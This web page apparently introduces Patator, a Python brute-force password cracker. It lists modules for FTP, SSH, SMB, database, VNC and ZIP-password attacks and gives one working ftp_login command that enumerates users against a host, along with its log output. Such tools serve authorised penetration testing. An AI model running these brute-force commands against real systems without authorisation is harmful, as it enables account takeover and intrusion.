Patator – multi-purpose brute-force password cracker

1
0

1
1
0

Patator is NOT script-kiddie friendly, please read the README inside patator.py before reporting!

Patator – brute-force password cracker.

Patator was written out of frustration from using Hydra, Medusa, Ncrack, Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python, that strives to be more reliable and flexible than his fellow predecessors.

Download Py Files here

supported modules:

* ftp_login     : Brute-force FTP
* ssh_login     : Brute-force SSH
* telnet_login  : Brute-force Telnet
* smtp_login    : Brute-force SMTP
* smtp_vrfy     : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt     : Enumerate valid users using the SMTP RCPT TO command
* finger_lookup : Enumerate valid users using Finger
* http_fuzz     : Brute-force HTTP/HTTPS
* pop_login     : Brute-force POP
* pop_passd     : Brute-force poppassd (not POP3)
* imap_login    : Brute-force IMAP
* ldap_login    : Brute-force LDAP
* smb_login     : Brute-force SMB
* smb_lookupsid : Brute-force SMB SID-lookup
* rlogin_login  : Brute-force rlogin
* vmauthd_login : Brute-force VMware Authentication Daemon
* mssql_login   : Brute-force MSSQL
* oracle_login  : Brute-force Oracle
* mysql_login   : Brute-force MySQL
* mysql_query   : Brute-force MySQL queries
* pgsql_login   : Brute-force PostgreSQL
* vnc_login     : Brute-force VNC
* dns_forward   : Brute-force DNS
* dns_reverse   : Brute-force DNS (reverse lookup subnets)
* snmp_login    : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass    : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files
* umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes

FTP : Enumerating users denied login in vsftpd/userlist



$ ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
19:36:06 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 19:36 AEDT
19:36:06 patator INFO -
19:36:06 patator INFO - code size time | candidate | num | mesg
19:36:06 patator INFO - -----------------------------------------------------------------------------
19:36:07 patator INFO - 230 17 0.002 | anonymous | 7 | Login successful.
19:36:07 patator INFO - 230 17 0.001 | ftp | 10 | Login successful.
19:36:08 patator INFO - 530 18 1.000 | root | 1 | Permission denied.
19:36:17 patator INFO - 530 18 1.000 | michael | 50 | Permission denied.
19:36:36 patator INFO - 530 18 1.000 | robert | 93 | Permission denied.
19:36:38 patator INFO - Hits/Done/Skip/Fail/Size: 5/100/0/0/100, Avg: 3 r/s, Time: 0h 0m 31s
...